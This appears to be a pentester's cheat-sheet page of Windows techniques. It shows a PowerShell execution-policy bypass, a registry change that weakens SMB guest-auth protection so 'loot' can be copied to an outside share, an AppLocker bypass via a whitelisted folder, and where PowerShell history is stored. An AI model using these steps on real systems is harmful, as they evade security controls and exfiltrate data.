Skip to content

Windows

PowerShell's execution policy

PowerShell's execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts.

Load a powershell shell with execution policy bypassed :

C:\> powershell -ep bypass

Registry

Edit key

To fix the following error, you need to set AllowInsecureGuestAuth, located in HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters, to 1.

PS C:\Users\Administrator> copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
copy : You can't access this shared folder because your organization's security policies block unauthenticated guest access. These
policies help protect your PC from unsafe or malicious devices on the network.
At line:1 char:1
+ copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-Item], IOException
    + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand

You can do it with powershell :

PS C:\Users\Administrator> Set-Itemproperty -path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters' -Name 'AllowInsecureGuestAuth' -value 1

Bypass AppLocker

If AppLocker is configured with default AppLocker rules, we can bypass it by placing our executable in the following directory: C:\Windows\System32\spool\drivers\color (whitelisted by default).

Powershell history

  • ConsoleHost_history : %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt